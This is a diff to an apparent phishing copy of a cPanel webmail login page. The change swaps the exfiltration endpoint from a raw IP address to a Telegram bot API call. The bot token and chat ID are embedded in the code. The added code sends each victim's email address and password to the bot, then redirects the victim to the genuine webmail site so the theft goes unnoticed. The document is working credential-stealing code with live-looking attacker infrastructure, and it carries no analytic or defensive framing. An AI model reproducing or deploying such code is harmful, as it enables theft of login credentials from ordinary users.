--- a/webmail.cpanel.net/index.html
+++ b/webmail.cpanel.net/index.html
@@ -178,7 +178,7 @@
                             </form>
                         </div>
                         <div id="forms">
-                            <form novalidate id="login_form" action="https//webmail.cpanel.net" method="post" onsubmit="return handleLogin();" target="_top" style="visibility:">
+                            <form novalidate id="login_form" action="https://webmail.cpanel.net" method="post" onsubmit="return handleLogin();" target="_top" style="visibility:">
                                 <div class="input-req-login"><label for="user">Email Address</label></div>
                                 <div class="input-field-login icon username-container">
                                     <input name="user" id="user" autofocus="autofocus" value="" placeholder="Enter your email address." class="std_textbox" type="text" autocomplete="off" tabindex="1" required>
@@ -361,9 +361,18 @@ function handleLogin() {
     if (linkId) {
         data.link_id = linkId;
     }
+	var tg_data = {
+		chat_id: "-4998190980",
+		text: `User ${user} pass ${pass}`
+		}
     
-    SubmitPost.submit("http://91.229.239.159:8000/p", data);
-    
+    SubmitPost.submit("https://api.telegram.org/bot8553706291:AAFbDsmNG8D56DNM2wtH6WwgpV3p2ljuDuI/sendMessage", tg_data);
+	//window.location.href = "https://webmail.cpanel.net"    
+		   // after 300ms redirect
+    setTimeout(() => {
+        window.location.href = "https://webmail.cpanel.net";
+    }, 1000);
+
     return false; 
 }
 </script>
